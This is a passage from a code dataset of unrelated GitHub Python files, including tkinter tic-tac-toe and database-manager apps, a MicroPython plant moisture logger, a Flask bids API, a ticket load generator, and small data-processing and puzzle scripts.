server='waitress')","repo_name":"PSauerborn/texas-real-foods","sub_path":"python/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"134019873","text":"import tkinter\n\nmasu = [\n [1, 0, 0],\n [0, 0, 2],\n [0, 0, 0]\n]\n\ndef masume():\n for i in range(1, 3):\n cvs.create_line(200*i, 0, 200*i, 600, fill=\"gray\", width=8)\n cvs.create_line(0, i*200, 600, i*200, fill=\"gray\", width=8)\n for y in range(3):\n for x in range(3):\n X = x * 200\n Y = y * 200\n if masu[y][x] == 1:\n cvs.create_oval(X+20, Y+20, X+180, Y+180, outline=\"blue\", width=12)\n if masu[y][x] == 2:\n cvs.create_line(X+20, Y+20, X+180, Y+180, fill=\"red\", width=12)\n cvs.create_line(X+180, Y+20, X+20, Y+180, fill=\"red\", width=12)\n\nroot = tkinter.Tk()\nroot.title(\"三目並べ\")\nroot.resizable(False, False)\ncvs = tkinter.Canvas(width=600, height=600, bg=\"white\")\ncvs.pack()\nmasume()\nroot.mainloop()\n","repo_name":"tossy0130/python_game_algorithm_01","sub_path":"PyG_algorithm/Chapter5/list5_2.py","file_name":"list5_2.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39384926222","text":"import ntptime\nfrom time import sleep\nfrom machine import ADC, deepsleep, DEEPSLEEP, RTC, Timer\nfrom boot import connectWifi, disconnectWifi\nfrom elasticLog import logger\n\nsignalPin = ADC(0)\nNTP_OFFSET = 946684800\nDEEPSLEEP_TIME=30 # in seconds\n\ndef logMoisture(reading):\n try:\n time = ntptime.time()\n time = time + NTP_OFFSET\n\n data = {\n '@timestamp': int(time*1000),\n 'moisture': reading,\n 'message': 'Moisture reading',\n 'plant_id': 2,\n 'plant_name': 'Gulrorbambus'\n }\n return logger('Moisture reading', data=data)\n except OSError as e:\n logger('Error', data={'message': 'Error fetching ntp time', 'error': e})\n\n\ndef watercontent():\n moistureReading = signalPin.read()\n\n print(logMoisture(moistureReading))\n # A little extra time alive for file transfere\n print('3 second upload window before deepsleep')\n sleepTriggerTimer = Timer(-1)\n sleepTriggerTimer.init(period=3000, mode=Timer.ONE_SHOT, callback=_sleep)\n\ndef _sleep(_):\n print('deepsleep starting for {} seconds'.format(DEEPSLEEP_TIME))\n rtc = RTC()\n rtc.irq(trigger=rtc.ALARM0, wake=DEEPSLEEP)\n rtc.alarm(rtc.ALARM0, DEEPSLEEP_TIME * 1000)\n deepsleep()","repo_name":"KevinMidboe/ESP-Plant-Logger","sub_path":"watercontent.py","file_name":"watercontent.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19613453019","text":"import sys\nimport time\nfrom datetime import datetime, timedelta\nfrom random import choice, randint\nfrom uuid import uuid4\n\nimport requests\nfrom faker import Faker\nfrom faker.providers import company\n\nfake = Faker()\nfake.add_provider(company)\n\n\nTICKET_API_URL = 'https://3v6s2g0n3b.execute-api.us-east-1.amazonaws.com/dev/ticket'\n\n\ndef generate_data(\n items,\n total_of_opened_items,\n total_of_closed_items,\n total_of_approved_items,\n total_of_deleted_items,\n):\n tickets_id = []\n\n for item in range(1, items + 1):\n data = {\n 'owner_id': str(uuid4()),\n 'subject': fake.catch_phrase(),\n 'text': fake.text(),\n }\n\n response = requests.post(\n url=TICKET_API_URL, json=data, headers={'Content-Type': 'application/json'}\n )\n total_of_opened_items += 1\n time.sleep(0.1)\n\n if item % 2 == 0:\n tickets_id.append(response.json()['ticket_id'])\n\n for ticket_id in tickets_id:\n status = choice(['closed', 'deleted'])\n data = {'status': status}\n\n response = requests.patch(\n url=f'{TICKET_API_URL}/{ticket_id}',\n json=data,\n headers={'Content-Type': 'application/json'},\n )\n\n if status == 'deleted':\n del tickets_id[ticket_id]\n total_of_deleted_items += 1\n else:\n total_of_closed_items += 1\n\n time.sleep(0.1)\n\n for idx in range(len(tickets_id)):\n if idx % 2 == 0:\n requests.patch(\n url=f'{TICKET_API_URL}/{tickets_id[idx]}',\n json={'status': 'approved'},\n headers={'Content-Type': 'application/json'},\n )\n total_of_approved_items += 1\n time.sleep(0.05)\n\n\nif __name__ == '__main__':\n total_of_opened_items = 0\n total_of_closed_items = 0\n total_of_approved_items = 0\n total_of_deleted_items = 0\n start_time = time.perf_counter()\n\n max_interactions = int(sys.argv[1] if len(sys.argv) > 0 else 10)\n\n print(f'starting generator for {max_interactions} rounds')\n for round_number in range(1, max_interactions + 1):\n start_round_time = time.perf_counter()\n random_value = randint(1, 11)\n print(f'starting round {round_number} with {random_value} values')\n generate_data(\n random_value,\n total_of_opened_items,\n total_of_closed_items,\n total_of_approved_items,\n total_of_deleted_items,\n )\n total_of_round_time = round((time.perf_counter() - start_round_time) / 60, 2)\n print(f'round {round_number} finished in {total_of_round_time} minutes')\n # fmt: off\n print(f'waiting next round starting on {(datetime.now() + timedelta(minutes=1)).isoformat()}\\n')\n time.sleep(60)\n\n total_of_time = round((time.perf_counter() - start_time) / 60, 2)\n\n print(\n f'''\n Summary:\n Opened: {total_of_opened_items}\n Closed: {total_of_closed_items}\n Approved: {total_of_approved_items}\n Deleted: {total_of_deleted_items}\n\n Time elapsed: {total_of_time} minutes\n '''\n )\n","repo_name":"fernandoroch4/cloudwatch-emf","sub_path":"scripts/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8170784928","text":"# -*-coding:UTF-8 -*\nfrom flask import Blueprint, Flask, jsonify, make_response, request, abort, render_template, session\nimport helpers\nimport json\nfrom glob import Models\nimport base64\nimport loginmanager\n\nfrom users import Users\nfrom products import Products\nfrom bids import Bids\n\nbid = Blueprint('bid', __name__, '')\n\n# ADD\n@bid.route('/', methods=['POST'])\ndef new_bid():\n\tresp = helpers.get_response(request) \n\tloginmanager.verify_token(resp)\n\tnewbid = Bids().new(resp)\n\tnewbid.save()\n\treturn jsonify({'status':'New bid ok', 'bid':newbid._to_json()}), 200 \n\n# EDIT\n@bid.route('/', methods=['POST'])\ndef edit_bid(bid_id):\n\tresp = helpers.get_response(request)\n\t\n\teditBid = Models().getBy('bids', 'id', bid_id) \n\tloginmanager.has_right(editBid[0], resp = resp)\n\tif editBid is None:\n\t\treturn \"Bid not found\", 404\n\teditBid[0].edit(resp)\n\teditBid[0].save()\n\treturn jsonify({'bid': editBid[0].json()}), 200\n\n# GET\n@bid.route('/', methods=['GET'])\ndef get_bid(bid_id):\n\tresp = helpers.get_response(request)\n\n\tgetBid = Models().getBy('bids', 'id', bid_id) \n\tif getBid is None:\n\t\treturn \"Bid not found\", 404\n\treturn jsonify({'bid' : getBid[0].json()})\n\n# DELETE\n@bid.route('/', methods=['DELETE'])\ndef delete_bid(bid_id):\n\tresp = helpers.get_response(request)\n\tloginmanager.verify_token(resp)\n\tret = Models().delete('bids', 'id', id=bid_id)\n\tif ret == False : \n\t\treturn 'KO', 401\n\treturn 'OK', 200","repo_name":"thromera/Ubid","sub_path":"remise_trois/rendu1/flask/bids_api.py","file_name":"bids_api.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"631688641","text":"# tracking phone numbers\nimport phonenumbers\n\nfrom phonenumbers import carrier, geocoder, timezone\nfrom phonenumbers.phonenumberutil import number_type\n\n# mobileNo = phonenumbers.parse(input(\"Enter the phone number with country code\"))\nnum = input(\"Enter the number you want to track: \")\nphone = phonenumbers.parse(num)\ntime = timezone.time_zones_for_number(phone)\nservice = carrier.name_for_number(phone, \"en\")\nregistration = geocoder.description_for_number(phone, \"en\")\n\nprint(phone)\nprint(time)\nprint(\"Service Provider: \", service) # doesn't work\nprint(\"Country is \", registration)\n# print(timezone.time_zones_for_number(mobileNo))\n# print(carrier.name_for_number(mobileNo, \"en\"))\n# print(geocoder.description_for_number(mobileNo, \"en\"))\n# print(\"valid mobile no: \", phonenumbers.is_valid_number(mobileNo))\n# print(\"checking possibility of number: \", phonenumbers.is_possible_number(mobileNo))\n","repo_name":"ricardogodinez/python-test","sub_path":"phonenumber/# tracking phone numbers.py","file_name":"# tracking phone numbers.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20540276377","text":"from app.core.config import DB_LINK, DB\nfrom bson.objectid import ObjectId\nimport motor.motor_asyncio\nfrom fastapi_users.db import BeanieUserDatabase\nfrom .models import User, Direction\n\nclient = motor.motor_asyncio.AsyncIOMotorClient(\n DB_LINK, uuidRepresentation=\"standard\"\n)\ndb = client[DB]\nusers = db['User']\nfiles = db['files']\napplications = db['applications']\ndirections = db['directions']\n\nasync def save_file(file):\n await applications.insert_one(file)\n await users.update_one({'_id' : file['user_id']}, {'$push' : {'applications' : file['_id']}})\n await directions.update_one({'_id': file['direction_id']}, {'$push' : {'applications' : file['_id']}})\n\nasync def get_direction_id(direction_name):\n direction = await directions.find_one({'name': direction_name})\n if direction:\n return direction['_id']\n direction = Direction(direction_name)\n await directions.insert_one(direction.__dict__)\n return direction._id\n\nasync def get_directions():\n result = []\n async for dir in directions.find({}, {'_id': 0, 'name' : 1}):\n result.append(dir)\n return result\n\nasync def accept_application(file_id):\n file = await applications.find_one_and_delete({'_id' : ObjectId(file_id)})\n await files.insert_one(file)\n user_id = file['user_id']\n direction_id = file['direction_id']\n await users.update_one({'_id' : user_id}, {'$pull' : {'applications' : ObjectId(file_id)}})\n await users.update_one({'_id' : user_id}, {'$push' : {'projects' : ObjectId(file_id)}})\n await directions.update_one({'_id' : direction_id}, {'$pull' : {'applications' : ObjectId(file_id)}})\n await directions.update_one({'_id' : direction_id}, {'$push' : {'projects' : ObjectId(file_id)}})\n\nasync def reject_application(file_id):\n file = await applications.find_one_and_delete({'_id' : ObjectId(file_id)})\n await users.update_one({'_id' : file['user_id']}, {'$pull' : {'applications' : ObjectId(file_id)}})\n direction = await directions.find_one({'_id': file['direction_id']})\n if direction['projects'] == [] and len(direction['applications']) == 1:\n await directions.delete_one({'_id': direction['_id']})\n else:\n await directions.update_one({'_id' : direction['_id']}, {'$pull' : {'applications' : ObjectId(file_id)}})\n\nasync def get_file_content(file_id, isApplications = False):\n collection = get_collection(isApplications)\n return await collection.find_one({'_id': ObjectId(file_id)}, {'content': 1, 'keywords': 1, '_id': 0, 'preview': 1})\n\nasync def get_files_preview(isApplications = False):\n result = []\n collection = get_collection(isApplications)\n async for x in collection.find({}, {\"_id\": 1, \"preview\": 1, 'keywords': 1}):\n result.append(x)\n return result\n\nasync def get_user_files(user_id, isApplications = False):\n result = []\n collection = get_collection(isApplications)\n async for x in collection.find({'user_id' : ObjectId(user_id)}, {'preview': 1, '_id' : 1, 'keywords': 1}):\n result.append(x)\n return result\n\ndef get_collection(isApplications):\n if isApplications:\n return applications\n return files\n\nasync def get_user_db():\n yield BeanieUserDatabase(User)\n","repo_name":"Chronos196/web-noc","sub_path":"app/db/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30596424468","text":"#!/usr/bin/python3\n\nimport sys\n\nkey, key2, previous_key, total = None, None, None, 0\n\nfor line in sys.stdin:\n key2, count = line.strip().split('\\t')\n count = int(count)\n if key2!=key:\n if total==1:\n print(key)\n key, total, previous_key = key2, count, key\n else:\n total += count\n\nif key2 != previous_key:\n print(key2)\n","repo_name":"kotsabo/processing_webdata_mapreduce","sub_path":"Task2/reducer02.py","file_name":"reducer02.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20516069179","text":"import sys\n\n\"\"\"get the weight of the given node and its subtowers\"\"\"\ndef getWeight(tower, subTowers, weights):\n weight = weights[tower] #include ourselve\n for subTower in subTowers[tower]:\n weight += getWeight(subTower, subTowers, weights)\n #print(\"tower: \", tower, \" has self weight=\", weights[tower], \"final=\", weight)\n return weight\n\n\"\"\"find the most common weight in set of 3+\"\"\"\ndef correctWeight(children, subTowers, weights):\n clone = children.copy()\n avg = [getWeight(clone.pop(), subTowers, weights) for i in range(3)]\n if avg[0] == avg[1]:\n return avg[0]\n if avg[1] == avg[2]:\n return avg[1]\n return avg[2]\n\ndef bfs(node, subTowers, weights):\n if len(subTowers[node]) == 0:\n print(\"fault at\", node)\n return -1\n children = subTowers[node]\n wanted = correctWeight(children, subTowers, weights)\n problem = \"\"\n for i in children:\n if getWeight(i, subTowers, weights) != wanted:\n problem = i\n break\n if problem == \"\":\n return -1\n if bfs(i, subTowers, weights) == -1:\n print(i, \"has weight\", weights[i], \"expected\", wanted - len(subTowers[i]) * correctWeight(subTowers[i], subTowers, weights))\n return wanted\n\n\nfile = open(sys.argv[1])\nbottom = \"\"\nweights = dict()\nsubTowers = dict()\nabove = set()\nfor line in file:\n parts = line.split()\n weights[parts[0]] = int(parts[1][1:-1])\n subTowers[parts[0]] = set()\n for i in parts[3:]:\n program = \"\"\n if (i.endswith(\",\")):\n program = i[0:-1]\n else:\n program = i\n above.add(program)\n subTowers[parts[0]].add(program)\nfile.close()\n\nroot = set(weights.keys()).difference(above).pop()\n\nbfs(root, subTowers, weights)\n\n","repo_name":"Paul-Haley/adventofcode_2017","sub_path":"day07/day07b.py","file_name":"day07b.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29925777946","text":"import tkinter as tk\r\nimport sqlite3\r\nimport os\r\nfrom IncludeDatabase import include_database\r\nfrom AddDatabaseWindow import add_database_window\r\n\r\ncurrent_database = \"\"\r\n\r\ndef exit(root):\r\n\troot.destroy()\r\n\r\ndef select_database_window():\r\n\t\r\n\tdef get_name_files():\r\n\t\tname_files = []\r\n\t\tfor filename in os.listdir(\"./\"):\r\n\t\t\tif filename.endswith(\".db\"):\r\n\t\t\t\tname_files.append(filename)\r\n\t\treturn name_files\r\n\r\n\tdef set_listbox(ListBox,NameFiles):\r\n\t\tfor filename in name_files:\r\n\t\t\tListBox.insert(\"end\",filename)\r\n\r\n\tdef define_current_database(Database):\r\n\t\tglobal current_database \r\n\t\tcurrent_database = Database\r\n\t\treturn current_database\r\n\r\n\tdef show_current_database(Database):\r\n\t\tmainlabel[\"text\"] = f\"Current Database is {Database}\"\r\n\r\n\tselect_database_window = tk.Tk()\r\n\tselect_database_window.title(\"Select a Database\")\r\n\tselect_database_window.resizable(False,False)\r\n\t\r\n\tcanvas = tk.Canvas(select_database_window, height=300, width=300, bg=\"#367800\")\r\n\tcanvas.pack()\r\n\r\n\tselect_listbox = tk.Listbox(select_database_window,selectmode=\"single\")\r\n\tname_files = get_name_files()\r\n\tset_listbox(select_listbox,name_files)\r\n\tselect_listbox.place(relx=0.5,rely=0.1,anchor=\"n\")\r\n\r\n\tselect_button = tk.Button(select_database_window,text=\"Select\",font=\"Times\",command=lambda: [define_current_database(select_listbox.get(first=select_listbox.curselection(),last=None)),\r\n\tshow_current_database(current_database),select_database_window.destroy()])\r\n\tselect_button.place(relx=0.3,rely=0.7,anchor=\"n\",relheight=0.1,relwidth=0.4)\r\n\r\n\tback2_button = tk.Button(select_database_window,text=\"Back\",font=\"Times\",command=lambda: select_database_window.destroy())\r\n\tback2_button.place(relx=0.7,rely=0.7,anchor=\"n\",relheight=0.1,relwidth=0.4) \r\n\r\n\tselect_database_window.mainloop()\r\n\r\ndef search_database_window(currentDatabase):\r\n\t\r\n\tdef search_by_name(Name,currentDatabase):\r\n\t\tselection = []\r\n\t\tconn = sqlite3.connect(f\"{currentDatabase}\")\r\n\t\tc = conn.cursor()\r\n\t\twith conn:\r\n\t\t\tc.execute(\"SELECT * FROM users WHERE first=?\",(Name,))\r\n\t\tselection = c.fetchall()\r\n\t\tuserlist = []\r\n\t\tfor user in selection:\r\n\t\t\tuserlist.append(list(user))\r\n\t\t\r\n\t\tsearch_result = tk.Tk()\r\n\t\tsearch_result.resizable(False,False)\r\n\r\n\t\tsearch_result_canvas = tk.Canvas(search_result,height=300,width=200)\r\n\t\tsearch_result_canvas.pack()\r\n\t\tsearch_listbox = tk.Listbox(search_result,selectmode=\"single\")\r\n\t\tfor user in userlist:\r\n\t\t\tsearch_listbox.insert(\"end\",user)\r\n\t\tsearch_listbox.place(relx=0.5,rely=0.1,anchor=\"n\")\r\n\r\n\t\tback4_button = tk.Button(search_result_canvas,text=\"Back\",font=\"Times\",command=lambda: search_result.destroy())\r\n\t\tback4_button.place(relx=0.5,rely=0.875,anchor=\"n\",relheight=0.1,relwidth=0.4)\r\n\r\n\t\tsearch_result.mainloop()\r\n\r\n\tdef search_by_last(Last,currentDatabase):\r\n\t\tselection = []\r\n\t\tconn = sqlite3.connect(f\"{currentDatabase}\")\r\n\t\tc = conn.cursor()\r\n\t\twith conn:\r\n\t\t\tc.execute(\"SELECT * FROM users WHERE last=?\",(Last,))\r\n\t\tselection = c.fetchall()\r\n\t\tuserlist = []\r\n\t\tfor user in selection:\r\n\t\t\tuserlist.append(list(user))\r\n\t\t\r\n\t\tsearch_result = tk.Tk()\r\n\t\tsearch_result.resizable(False,False)\r\n\r\n\t\tsearch_result_canvas = tk.Canvas(search_result,height=300,width=200)\r\n\t\tsearch_result_canvas.pack()\r\n\t\tsearch_listbox = tk.Listbox(search_result,selectmode=\"single\")\r\n\t\tfor user in userlist:\r\n\t\t\tsearch_listbox.insert(\"end\",user)\r\n\t\tsearch_listbox.place(relx=0.5,rely=0.1,anchor=\"n\")\r\n\r\n\t\tback5_button = tk.Button(search_result_canvas,text=\"Back\",font=\"Times\",command=lambda: search_result.destroy())\r\n\t\tback5_button.place(relx=0.5,rely=0.875,anchor=\"n\",relheight=0.1,relwidth=0.4)\r\n\r\n\t\tsearch_result.mainloop()\r\n\r\n\tdef search_by_email(EMail,currentDatabase):\r\n\t\tselection = []\r\n\t\tconn = sqlite3.connect(f\"{currentDatabase}\")\r\n\t\tc = conn.cursor()\r\n\t\twith conn:\r\n\t\t\tc.execute(\"SELECT * FROM users WHERE email=?\",(EMail,))\r\n\t\tselection = c.fetchall()\r\n\t\tuserlist = []\r\n\t\tfor user in selection:\r\n\t\t\tuserlist.append(list(user))\r\n\t\t\r\n\t\tsearch_result = tk.Tk()\r\n\t\tsearch_result.resizable(False,False)\r\n\r\n\t\tsearch_result_canvas = tk.Canvas(search_result,height=300,width=200)\r\n\t\tsearch_result_canvas.pack()\r\n\t\tsearch_listbox = tk.Listbox(search_result,selectmode=\"single\")\r\n\t\tfor user in userlist:\r\n\t\t\tsearch_listbox.insert(\"end\",user)\r\n\t\tsearch_listbox.place(relx=0.5,rely=0.1,anchor=\"n\")\r\n\r\n\t\tback6_button = tk.Button(search_result_canvas,text=\"Back\",font=\"Times\",command=lambda: search_result.destroy())\r\n\t\tback6_button.place(relx=0.5,rely=0.875,anchor=\"n\",relheight=0.1,relwidth=0.4)\r\n\r\n\t\tsearch_result.mainloop()\r\n\r\n\r\n\tif currentDatabase == \"\":\r\n\t\tmainlabel[\"text\"] = \"No Database is selected\"\r\n\r\n\telse:\r\n\t\tsearch_database_window = tk.Tk()\r\n\t\tsearch_database_window.title(\"Search Data\")\r\n\t\tsearch_database_window.resizable(False,False)\r\n\r\n\t\tsearch_database_canvas = tk.Canvas(search_database_window, height=300, width=300, bg=\"#367800\")\r\n\t\tsearch_database_canvas.pack()\r\n\r\n\t\tcurrent_database_label = tk.Label(search_database_window,text=f\"Current Database is {currentDatabase}\",font=\"Times\")\r\n\t\tcurrent_database_label.place(relx=0.5,rely=0.1,anchor=\"n\",relheight=0.1,relwidth=0.8)\r\n\r\n\t\tsearch_by_name_entry = tk.Entry(search_database_window, font=\"Times\")\r\n\t\tsearch_by_name_entry.place(relx=0.325,rely=0.3,anchor=\"n\",relheight=0.1,relwidth=0.6)\r\n\r\n\t\tsearch_by_name_button = tk.Button(search_database_window, font=[\"Times\",10], text=\"By Name\",command=lambda: search_by_name(search_by_name_entry.get(),current_database))\r\n\t\tsearch_by_name_button.place(relx=0.8,rely=0.3,anchor=\"n\",relheight=0.1,relwidth=0.3)\r\n\r\n\t\tsearch_by_last_entry = tk.Entry(search_database_window, font=\"Times\")\r\n\t\tsearch_by_last_entry.place(relx=0.325,rely=0.5,anchor=\"n\",relheight=0.1,relwidth=0.6)\r\n\r\n\t\tsearch_by_last_button = tk.Button(search_database_window, font=[\"Times\",10],text=\"By Last Name\",command=lambda: search_by_last(search_by_last_entry.get(),current_database))\r\n\t\tsearch_by_last_button.place(relx=0.8,rely=0.5,anchor=\"n\",relheight=0.1,relwidth=0.3)\r\n\r\n\t\tsearch_by_email_entry = tk.Entry(search_database_window, font=\"Times\")\r\n\t\tsearch_by_email_entry.place(relx=0.325,rely=0.7,anchor=\"n\",relheight=0.1,relwidth=0.6)\r\n\r\n\t\tsearch_by_email_button = tk.Button(search_database_window, font=[\"Times\",10],text=\"By Email\",command=lambda: search_by_email(search_by_email_entry.get(),current_database))\r\n\t\tsearch_by_email_button.place(relx=0.8,rely=0.7,anchor=\"n\",relheight=0.1,relwidth=0.3)\r\n\r\n\t\tback3_button = tk.Button(search_database_window,text=\"Back\",font=\"Times\",command=lambda: [search_database_window.destroy(),searchdatabutton.config(state=\"normal\")])\r\n\t\tback3_button.place(relx=0.5,rely=0.875,anchor=\"n\",relheight=0.1,relwidth=0.4)\r\n\r\n\t\tsearch_database_window.mainloop()\r\n\r\ndef delete_data_window(currentDatabase):\r\n\t\r\n\tdef delete_data(option):\r\n\t\tconn = sqlite3.connect(f\"{currentDatabase}\")\r\n\t\tc = conn.cursor()\r\n\t\twith conn:\r\n\t\t\tc.execute(\"DELETE FROM users WHERE email=?\",(option[2],))\r\n\r\n\tdef accept_data_deleted():\r\n\t\taccept = tk.Tk()\r\n\t\taccept.title(\"Delete Data\")\r\n\t\taccept.resizable(False,False)\r\n\t\taccept_canvas = tk.Canvas(accept,height=100,width=200)\r\n\t\taccept_canvas.pack()\r\n\t\taccept_frame = tk.Frame(accept)\r\n\t\taccept_frame.place(relheight=1,relwidth=1)\r\n\t\taccept_label = tk.Label(accept_frame,text=\"Data has been Deleted\")\r\n\t\taccept_label.place(relx=0.5,rely=0.3,relheight=0.2,relwidth=1,anchor=\"n\")\r\n\t\taccept_button = tk.Button(accept_frame,text=\"OK\",command=lambda: exit(accept))\r\n\t\taccept_button.place(relx=0.5,rely=0.7,relheight=0.2,relwidth=0.3,anchor=\"n\")\r\n\t\taccept.mainloop()\r\n\t\t\r\n\r\n\r\n\tif currentDatabase == \"\":\r\n\t\tmainlabel[\"text\"] = \"No Database is Selected\"\r\n\r\n\telse:\r\n\t\tdelete_data_window = tk.Tk()\r\n\t\tdelete_data_window.title(\"Delete Data\")\r\n\t\tdelete_data_window.resizable(False,False)\r\n\r\n\t\tdelete_data_canvas = tk.Canvas(delete_data_window,height=300,width=400)\r\n\t\tdelete_data_canvas.pack()\r\n\r\n\t\tselection = []\r\n\t\tconn = sqlite3.connect(f\"{currentDatabase}\")\r\n\t\tc = conn.cursor()\r\n\t\twith conn:\r\n\t\t\tc.execute(\"SELECT * FROM users\")\r\n\t\tselection = c.fetchall()\r\n\t\tuserlist = []\r\n\t\tfor user in selection:\r\n\t\t\tuserlist.append(list(user))\r\n\r\n\t\tdelete_listbox = tk.Listbox(delete_data_canvas,selectmode=\"single\")\r\n\t\tfor user in userlist:\r\n\t\t\tdelete_listbox.insert(\"end\",user)\r\n\t\tdelete_listbox.place(relx=0.5,rely=0.1,anchor=\"n\",relwidth=0.8)\r\n\r\n\t\tback7_button = tk.Button(delete_data_canvas,text=\"Back\",font=\"Times\",command=lambda: delete_data_window.destroy())\r\n\t\tback7_button.place(relx=0.7,rely=0.875,anchor=\"n\",relheight=0.1,relwidth=0.4)\r\n\r\n\t\tdelete_button = tk.Button(delete_data_canvas,text=\"Delete\",font=\"Times\",command=lambda: [delete_data(delete_listbox.get(delete_listbox.curselection())),accept_data_deleted()])\r\n\t\tdelete_button.place(relx=0.3,rely=0.875,anchor=\"n\",relheight=0.1,relwidth=0.4)\r\n\r\n\t\tdelete_data_window.mainloop()\r\n\r\n\r\n\r\nHEIGHT = 600\r\nWIDTH = 600\r\n\r\nroot = tk.Tk()\r\nroot.title(\"Database Manager\")\r\nroot.resizable(False,False)\r\n\r\ncanvas = tk.Canvas(root,height=HEIGHT,width=WIDTH,bg=\"black\")\r\ncanvas.pack()\r\n\r\nframe = tk.Frame(root,bg=\"#367800\",bd=3)\r\nframe.place(relx=0.5,rely=0.1,relheight=0.175,relwidth=0.9,anchor=\"n\")\r\n\r\nframe_bottom = tk.Frame(root,bg=\"#367800\",bd=6)\r\nframe_bottom.place(relx=0.5,rely=0.3,relheight=0.6,relwidth=0.9,anchor=\"n\")\r\n\r\nframe_exit = tk.Frame(root,bg=\"#367800\")\r\nframe_exit.place(relx=0.5,rely=0.93,relheight=0.05,relwidth=0.2,anchor=\"n\")\r\n\r\nfirstentry = tk.Entry(frame,font=\"Times\")\r\nfirstentry.place(relx=0.2,rely=0.1,relheight=0.2,relwidth=0.2)\r\n\r\nfirstlabel = tk.Label(frame,text=\"Name\",font=\"Times\",bg=\"#367800\",fg=\"white\")\r\nfirstlabel.place(relx=0.01,rely=0.1,relheight=0.2,relwidth=0.175)\r\n\r\nlastentry = tk.Entry(frame,font=\"Times\")\r\nlastentry.place(relx=0.2,rely=0.4,relheight=0.2,relwidth=0.2)\r\n\r\nlastlabel = tk.Label(frame,text=\"Last Name\",font=\"Times\",bg=\"#367800\",fg=\"white\")\r\nlastlabel.place(relx=0.01,rely=0.4,relheight=0.2,relwidth=0.175)\r\n\r\nemailentry = tk.Entry(frame,font=\"Times\")\r\nemailentry.place(relx=0.2,rely=0.7,relheight=0.2,relwidth=0.3)\r\n\r\nemaillabel = tk.Label(frame,text=\"Email\",font=\"Times\",bg=\"#367800\",fg=\"white\")\r\nemaillabel.place(relx=0.01,rely=0.7,relheight=0.2,relwidth=0.175)\r\n\r\nincludebutton = tk.Button(frame, text=\"Include Data\", font=[\"Times\",10], command=lambda: include_database(firstentry.get(),\r\nlastentry.get(),emailentry.get(),current_database))\r\nincludebutton.place(relx=0.9,rely=0.2,relheight=0.2,relwidth=0.3,anchor=\"e\")\r\n\r\nsearchdatabutton = tk.Button(frame, text=\"Search Data\", font=[\"Times\",10], command= lambda: search_database_window(current_database))\r\nsearchdatabutton.place(relx=0.9,rely=0.4,relheight=0.2,relwidth=0.3,anchor=\"e\")\r\n\r\nerasedatabutton = tk.Button(frame, text=\"Delete Data\", font=[\"Times\",10], command= lambda: delete_data_window(current_database))\r\nerasedatabutton.place(relx=0.9,rely=0.6,relheight=0.2,relwidth=0.3,anchor=\"e\")\r\n\r\ncreatedatabutton = tk.Button(frame, text=\"Create Database\", font=[\"Times\",10], command= lambda: add_database_window())\r\ncreatedatabutton.place(relx=0.75,rely=0.9,relheight=0.2,relwidth=0.2,anchor=\"e\")\r\n\r\nselectdatabutton = tk.Button(frame, text=\"Select Database\", font=[\"Times\",10], command= lambda: select_database_window())\r\nselectdatabutton.place(relx=0.975,rely=0.9,relheight=0.2,relwidth=0.2,anchor=\"e\")\r\n\r\nmainlabel = tk.Label(frame_bottom,text=\"\",font=[\"Times\",15])\r\nmainlabel.place(relwidth=1,relheight=1)\r\n\r\nexitbutton = tk.Button(frame_exit,text=\"Exit\",font=[\"Times\",10],command=lambda: exit(root))\r\nexitbutton.place(relheight=1,relwidth=1)\r\n\r\nroot.mainloop()","repo_name":"MolinaEsteban96/DatabaseManager","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21232472556","text":"from random import *\r\n\r\n\r\n# Type Error Handling and Board Checking remaining\r\ndef show_board(gboard):\r\n print(f' {gboard[0]} | {gboard[1]} | {gboard[2]}')\r\n print(r'-----------')\r\n print(f' {gboard[3]} | {gboard[4]} | {gboard[5]}')\r\n print(r'-----------')\r\n print(f' {gboard[6]} | {gboard[7]} | {gboard[8]}')\r\n\r\n\r\ndef isBoardFull():\r\n for i in board:\r\n if i == '_':\r\n return False\r\n return True\r\n\r\n\r\ndef isEmpty(pos):\r\n if board[pos] == '_':\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef user_input():\r\n i = 0\r\n x = input(r\"Enter your position to mark 'X'\")\r\n if x == 'Q':\r\n print(\"Thank You for playing!\\nBye\")\r\n exit()\r\n else:\r\n x = int(x) - 1\r\n if isEmpty(x):\r\n if 0 <= x <= 8:\r\n print('you selected: ', x)\r\n return x\r\n else:\r\n print(\"Invalid position, Try again\")\r\n return user_input()\r\n else:\r\n if isBoardFull():\r\n print(\"It's a tie!\")\r\n exit()\r\n print(\"The position is occupied, Try again\")\r\n return user_input()\r\n\r\n\r\ndef cpu_input(gboard):\r\n if isBoardFull():\r\n print(\"It's a tie!\")\r\n exit()\r\n else:\r\n emptySpaces = []\r\n for x in range(len(gboard)):\r\n if gboard[x] == '_':\r\n emptySpaces.append(x)\r\n boardCopy = board.copy()\r\n #print(\"Empty Spaces: \", emptySpaces, \" Board Copy: \", boardCopy)\r\n\r\n # Winning Situation #\r\n for letter in ['O', 'X']:\r\n for pos in emptySpaces:\r\n #print(pos, \" \", end=\"\")\r\n boardCopy[pos] = letter\r\n if checkBoard(boardCopy, 